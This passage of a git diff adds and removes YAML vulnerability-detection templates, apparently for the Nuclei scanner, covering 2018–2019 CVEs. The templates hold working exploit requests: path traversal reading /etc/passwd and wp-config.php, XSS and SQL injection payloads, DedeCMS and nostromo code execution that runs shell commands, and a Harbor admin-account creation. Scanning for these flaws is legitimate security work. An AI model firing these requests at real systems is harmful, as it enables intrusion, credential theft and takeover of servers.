http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html - - http://web.archive.org/web/20211206102649/https://securitytracker.com/id/1041897 - - https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 - - https://nvd.nist.gov/vuln/detail/CVE-2018-3167 - - http://www.securitytracker.com/id/1041897 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2018-3167 - epss-score: 0.00727 - epss-percentile: 0.7853 - cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* - metadata: - max-request: 1 - vendor: oracle - product: application_management_pack - framework: e-business_suite - tags: cve,cve2018,oracle,ebs,ssrf,blind - -http: - - method: POST - path: - - '{{BaseURL}}/OA_HTML/lcmServiceController.jsp' - - body: - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Unexpected text in DTD' - - - type: status - status: - - 200 -# digest: 4a0a0047304502205f8a37119fe732f7badb9d33b0b8bbb0a9984a14dc7dbc2e5a29af9e0255f448022100936e614a40ccff6d1b2e850a9dbbc0a248f721b2aaab7040dc2dc6bf25257756:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-5233-3567.yaml b/poc/cve/cve-2018-5233-3567.yaml deleted file mode 100644 index 8233b5cde4..0000000000 --- a/poc/cve/cve-2018-5233-3567.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-5233 -info: - name: Grav CMS before 1.3.0 allows XSS. - author: pikpikcu - severity: medium - description: | - Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-5233 - - https://sysdream.com/news/lab/2018-03-15-cve-2018-5233-grav-cms-admin-plugin-reflected-cross-site-scripting-xss-vulnerability/ - - http://www.openwall.com/lists/oss-security/2018/03/15/1 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-5233 - cwe-id: CWE-79 - tags: cve,cve2018,xss,grav -requests: - - method: GET - path: - - "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - text/html diff --git a/poc/cve/cve-2018-6008-3574.yaml b/poc/cve/cve-2018-6008-3574.yaml new file mode 100644 index 0000000000..1e302599a3 --- /dev/null +++ b/poc/cve/cve-2018-6008-3574.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-6008 + +info: + name: Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion + author: daffainfo + severity: high + description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter. + reference: + - https://www.exploit-db.com/exploits/43913 + - https://www.cvedetails.com/cve/CVE-2018-6008 + - https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-6008 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-6008 + cwe-id: CWE-200 + tags: cve,cve2018,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/08 diff --git a/poc/cve/cve-2018-6200-3578.yaml b/poc/cve/cve-2018-6200-3578.yaml deleted file mode 100644 index feaf1462b9..0000000000 --- a/poc/cve/cve-2018-6200-3578.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2018-6200 -info: - name: vBulletin 3.x.x & 4.2.x - Open Redirect - author: 0x_Akoko,daffainfo - severity: medium - description: | - vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter. - reference: - - https://cxsecurity.com/issue/WLB-2018010251 - - https://www.cvedetails.com/cve/CVE-2018-6200 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-6200 - cwe-id: CWE-601 - metadata: - verified: true - tags: cve,cve2018,redirect,vbulletin -requests: - - method: GET - path: - - '{{BaseURL}}/redirector.php?url=https://interact.sh' - - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-6910-3585.yaml b/poc/cve/cve-2018-6910-3585.yaml new file mode 100644 index 0000000000..0517017275 --- /dev/null +++ b/poc/cve/cve-2018-6910-3585.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-6910 +info: + name: DedeCMS 5.7 path disclosure + author: pikpikcu + severity: high + description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-6910 + - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md + - https://kongxin.gitbook.io/dedecms-5-7-bug/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-6910 + cwe-id: CWE-668 + tags: cve,cve2018,dedecms +requests: + - method: GET + path: + - "{{BaseURL}}/include/downmix.inc.php" + matchers-condition: and + matchers: + - type: word + words: + - "downmix.inc.php" + - "Call to undefined function helper()" + part: body + condition: and + - type: status + status: + - 200 diff --git a/poc/cve/cve-2018-7251-3587.yaml b/poc/cve/cve-2018-7251-3587.yaml deleted file mode 100644 index 17ebdb1a9e..0000000000 --- a/poc/cve/cve-2018-7251-3587.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-7251 - -info: - name: AnchorCMS Error Log Exposure - author: pdteam - severity: critical - tags: cve,cve2018,anchorcms,logs,error - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-7251 - cwe-id: CWE-200 - description: "An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred." - reference: - - https://github.com/anchorcms/anchor-cms/issues/1247 - - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html - - https://twitter.com/finnwea/status/965279233030393856 - - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html - - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7 - -requests: - - method: GET - path: - - '{{BaseURL}}/anchor/errors.log' - matchers: - - type: word - words: - - '"date":' - - '"message":' - - '"trace":[' - condition: and diff --git a/poc/cve/cve-2018-7467-3598.yaml b/poc/cve/cve-2018-7467-3598.yaml new file mode 100644 index 0000000000..209cbb7767 --- /dev/null +++ b/poc/cve/cve-2018-7467-3598.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-7467 +info: + name: AxxonSoft Axxon Next Directory Traversal + author: 0x_Akoko + severity: high + description: AxxonSoft Axxon Next suffers from a directory traversal vulnerability. + reference: + - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-7467 + - http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-7467 + cwe-id: CWE-200 + tags: cve,cve2018,axxonsoft,lfi +requests: + - raw: + - |+ + GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/poc/cve/cve-2018-7700-3618.yaml b/poc/cve/cve-2018-7700-3618.yaml new file mode 100644 index 0000000000..32b525bf7f --- /dev/null +++ b/poc/cve/cve-2018-7700-3618.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-7700 + +info: + name: DedeCMS V5.7SP2 RCE + author: pikpikcu + severity: high + reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ + tags: cve,cve2018,dedecms,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-7700 + cwe-id: CWE-352 + description: "DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code." + +requests: + - method: GET + path: + - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" + + matchers-condition: and + matchers: + + - type: word + words: + - "phpinfo" + - "PHP Version" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2018-9118-3654.yaml b/poc/cve/cve-2018-9118-3654.yaml deleted file mode 100644 index a56feb3899..0000000000 --- a/poc/cve/cve-2018-9118-3654.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2018-9118 - -info: - name: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php. - reference: - - https://www.exploit-db.com/exploits/44417 - - https://wpvulndb.com/vulnerabilities/9056 - - https://99robots.com/docs/wp-background-takeover-advertisements/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-9118 - remediation: | - Upgrade to 4.1.15. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-9118 - cwe-id: CWE-22 - tags: cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - - "DB_HOST" - - "The base configurations of the WordPress" - condition: and - -# Enhanced by mp on 2022/06/15 diff --git "a/poc/cve/cve-2018\342\200\22314064(1).yaml" "b/poc/cve/cve-2018\342\200\22314064(1).yaml" new file mode 100644 index 0000000000..d07fc4a0b2 --- /dev/null +++ "b/poc/cve/cve-2018\342\200\22314064(1).yaml" @@ -0,0 +1,21 @@ +id: cve-2018-14064 +info: + name: VelotiSmart Wifi - Directory Traversal + author: 0x_Akoko + severity: high + reference: | + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 + tags: velotismart,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-1010287-3696.yaml b/poc/cve/cve-2019-1010287-3696.yaml new file mode 100644 index 0000000000..b1afc71348 --- /dev/null +++ b/poc/cve/cve-2019-1010287-3696.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-1010287 +info: + name: Timesheet 1.5.3 - Cross Site Scripting + author: pikpikcu + severity: medium + description: 'Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 + - http://www.mdh-tz.info/ + - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/ + - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-1010287 + cwe-id: CWE-79 + metadata: + google-dork: inurl:"/timesheet/login.php" + tags: cve,cve2019,timesheet,xss +requests: + - raw: + - | + POST /timesheet/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '>' + part: body diff --git a/poc/cve/cve-2019-10692(1).yaml b/poc/cve/cve-2019-10692(1).yaml new file mode 100644 index 0000000000..66751d09e7 --- /dev/null +++ b/poc/cve/cve-2019-10692(1).yaml @@ -0,0 +1,35 @@ +id: CVE-2019-10692 +info: + name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection + author: pussycat0x + severity: critical + description: | + In the wp-google-maps plugin before 7.11.18 for WordPress, + includes/class.rest-api.php in the REST API does not sanitize field names + before a SELECT statement. + reference: + - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea + - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 + metadata: + verified: true + tags: cve,cve2019,sqli,wp,wordpress,wp-plugin,unauth,googlemaps +requests: + - method: GET + path: + - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"user_login"' + - '"user_pass"' + - '"user_nicename"' + condition: and + - type: word + part: header + words: + - application/json + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-11013-3719.yaml b/poc/cve/cve-2019-11013-3719.yaml new file mode 100644 index 0000000000..ea7a0c390c --- /dev/null +++ b/poc/cve/cve-2019-11013-3719.yaml @@ -0,0 +1,19 @@ +id: CVE-2019-11013 +info: + name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/47301 + tags: cves,lfi,nimble +requests: + - method: GET + path: + - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-11248-3731.yaml b/poc/cve/cve-2019-11248-3731.yaml deleted file mode 100644 index a5875ef6fe..0000000000 --- a/poc/cve/cve-2019-11248-3731.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2019-11248 - -info: - name: Debug Endpoint pprof - Exposure Detection - author: 0xceeb,ritikchaddha - severity: high - description: | - The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. - reference: - - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0 - - http://mmcloughlin.com/posts/your-pprof-is-showing - - https://github.com/kubernetes/kubernetes/issues/81023 - - https://groups.google.com/d/msg/kubernetes-security-announce/pKELclHIov8/BEDtRELACQAJ - - https://nvd.nist.gov/vuln/detail/CVE-2019-11248 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L - cvss-score: 8.2 - cve-id: CVE-2019-11248 - cwe-id: CWE-862 - tags: cve,cve2019,debug,kubernetes,kubelet,devops,unauth,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/debug/pprof/" - - "{{BaseURL}}/debug/pprof/goroutine?debug=1" - - stop-at-first-match: true - matchers: - - type: word - words: - - "Types of profiles available:" - - "Profile Descriptions" - - "goroutine profile: total" - condition: or - -# Enhanced by mp on 2022/06/15 diff --git a/poc/cve/cve-2019-11370(1).yaml b/poc/cve/cve-2019-11370(1).yaml deleted file mode 100644 index 58ffa77862..0000000000 --- a/poc/cve/cve-2019-11370(1).yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2019-11370 -info: - name: Carel pCOWeb < B1.2.4 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field. - reference: - - https://www.exploit-db.com/exploits/46897 - - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370 - - https://nvd.nist.gov/vuln/detail/CVE-2019-11370 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2019-11370 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"pCOWeb" - verified: "true" - tags: cve,cve2019,pcoweb,xss,carel -requests: - - raw: - - | - POST /config/pw_snmp_done.html HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - - | - GET /config/pw_snmp.html HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "text/html")' - - status_code_2 == 200 - - contains(body_2, 'value=\"\">\">') - condition: and diff --git a/poc/cve/cve-2019-12962(1).yaml b/poc/cve/cve-2019-12962(1).yaml new file mode 100644 index 0000000000..0be257a894 --- /dev/null +++ b/poc/cve/cve-2019-12962(1).yaml @@ -0,0 +1,40 @@ +id: CVE-2019-12962 +info: + name: LiveZilla Server 8.0.1.0 - Cross Site Scripting + author: Clment Cruchet + severity: medium + description: | + LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS + reference: + - https://www.exploit-db.com/exploits/49669 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 + - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ + - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12962 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:LiveZilla + verified: true + tags: cve,cve2019,livezilla,xss +requests: + - method: GET + path: + - '{{BaseURL}}/mobile/index.php' + headers: + Accept-Language: ';alert(document.domain)//' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var detectedLanguage = ';alert(document.domain)//';" + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-13101-3802.yaml b/poc/cve/cve-2019-13101-3802.yaml deleted file mode 100644 index fc313615ee..0000000000 --- a/poc/cve/cve-2019-13101-3802.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2019-13101 - -info: - author: Suman_Kar - name: D-Link DIR-600M Authentication Bypass - description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. - severity: critical - reference: - - https://github.com/d0x0/D-Link-DIR-600M - - https://www.exploit-db.com/exploits/47250 - - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-13101 - cwe-id: CWE-306 - tags: cve,cve2019,dlink,router,iot - -requests: - - raw: - - | - GET /wan.htm HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "/PPPoE/" - part: body - -# Enhanced by mp on 2022/03/29 diff --git a/poc/cve/cve-2019-14251(1).yaml b/poc/cve/cve-2019-14251(1).yaml new file mode 100644 index 0000000000..9b1fec3938 --- /dev/null +++ b/poc/cve/cve-2019-14251(1).yaml @@ -0,0 +1,31 @@ +id: CVE-2019-14251 +info: + name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal + author: 0x_Akoko + severity: high + description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server. + reference: + - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt + - https://www.cvedetails.com/cve/CVE-2019-14251 + - https://vuldb.com/?id.146815 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-14251 + cwe-id: CWE-22 + tags: cve,cve2019,temenos,lfi,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" + - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-15713-3887.yaml b/poc/cve/cve-2019-15713-3887.yaml new file mode 100644 index 0000000000..052732aa1e --- /dev/null +++ b/poc/cve/cve-2019-15713-3887.yaml @@ -0,0 +1,37 @@ +id: CVE-2019-15713 + +info: + name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo,dhiyaneshDk + severity: medium + description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + reference: + - https://wpscan.com/vulnerability/9267 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15713 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-16097.yaml b/poc/cve/cve-2019-16097.yaml deleted file mode 100644 index ac225380ac..0000000000 --- a/poc/cve/cve-2019-16097.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2019-16097 - -info: - name: Harbor <=1.82.0 - Privilege Escalation - author: pikpikcu - severity: medium - description: Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration. - remediation: Upgrade to v1.7.6 v1.8.3. v.1.9.0 or higher. A potential workaround without applying the fix is to configure Harbor to use a non-DB authentication backend such as LDAP. - reference: - - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ - - https://github.com/goharbor/harbor/issues/8951 - - https://nvd.nist.gov/vuln/detail/CVE-2019-16097 - - https://github.com/goharbor/harbor/commit/b6db8a8a106259ec9a2c48be8a380cb3b37cf517 - - http://www.vmware.com/security/advisories/VMSA-2019-0015.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N - cvss-score: 6.5 - cve-id: CVE-2019-16097 - cwe-id: CWE-862 - epss-score: 0.96909 - epss-percentile: 0.99643 - cpe: cpe:2.3:a:linuxfoundation:harbor:1.7.0:-:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: linuxfoundation - product: harbor - tags: cve,cve2019,intrusive,harbor - -http: - - method: POST - path: - - '{{BaseURL}}/api/users' - - body: | - {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"} - - headers: - Content-Type: application/json - - matchers-condition: and - matchers: - - type: word - part: response - words: - - "username has already been used" - - "Location: /api/users/" - condition: or - - - type: status - status: - - 201 - - 409 - condition: or -# digest: 4a0a00473045022100fce7a3f7a8a74bd39e0dac87eef7626ba3e8145472cb383a24537447f304dfeb022077620294cd6e60f810fb50ed0c3a2e8d878e6f96116a7ba5f47bbfe3f800a7b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-16123-3918.yaml b/poc/cve/cve-2019-16123-3918.yaml deleted file mode 100644 index 5868d97896..0000000000 --- a/poc/cve/cve-2019-16123-3918.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2019-16123 -info: - name: PilusCart <= 1.4.1 - Local File Disclosure - author: 0x_Akoko - severity: high - description: PilusCart versions 1.4.1 and below suffers from a file disclosure vulnerability. - reference: - - https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html - - https://www.cvedetails.com/cve/CVE-2019-16123 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-16123 - cwe-id: CWE-22 - tags: cve,cve2019,piluscart,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2019-16278.yaml b/poc/cve/cve-2019-16278.yaml new file mode 100644 index 0000000000..a51ac4cd0f --- /dev/null +++ b/poc/cve/cve-2019-16278.yaml @@ -0,0 +1,44 @@ +id: CVE-2019-16278 + +info: + name: nostromo 1.9.6 - Remote Code Execution + author: pikpikcu + severity: critical + description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify. + remediation: | + Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch. + reference: + - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html + - https://www.exploit-db.com/raw/47837 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16278 + - http://www.nazgul.ch/dev/nostromo_cl.txt + - http://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-16278 + cwe-id: CWE-22 + epss-score: 0.97359 + epss-percentile: 0.99879 + cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: nazgul + product: nostromo_nhttpd + tags: edb,cve,cve2019,rce,packetstorm + +http: + - raw: + - | + POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 + Host: {{Hostname}} + + echo + echo + cat /etc/passwd 2>&1 + + matchers: + - type: regex + regex: + - "root:.*:0:0:" +# digest: 490a0046304402202b368315a7a4c61659ca398d0f26e81ad5b9729a83f04c71b63ae9001a5d3a290220262d6b09a67529c0cd9550eecbee39eb90512b98a85355d3192d2d57cbb29814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-16931(1).yaml b/poc/cve/cve-2019-16931(1).yaml deleted file mode 100644 index 7cccc93c52..0000000000 --- a/poc/cve/cve-2019-16931(1).yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2019-16931 -info: - name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS) - author: ritikchaddha - severity: medium - description: | - By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart. - reference: - - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44 - - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - - https://nvd.nist.gov/vuln/detail/CVE-2019-16931 - - https://wpvulndb.com/vulnerabilities/9893 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-16931 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth -requests: - - raw: - - | - POST /wp-json/visualizer/v1/update-chart HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"id": 7, "visualizer-chart-type": ""} - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"success":"Chart updated"}' - - type: word - part: header - words: - - 'application/json' - - type: status - status: - - 200 diff --git a/poc/cve/cve-2019-17418-3981.yaml b/poc/cve/cve-2019-17418-3981.yaml deleted file mode 100644 index 86a6c43174..0000000000 --- 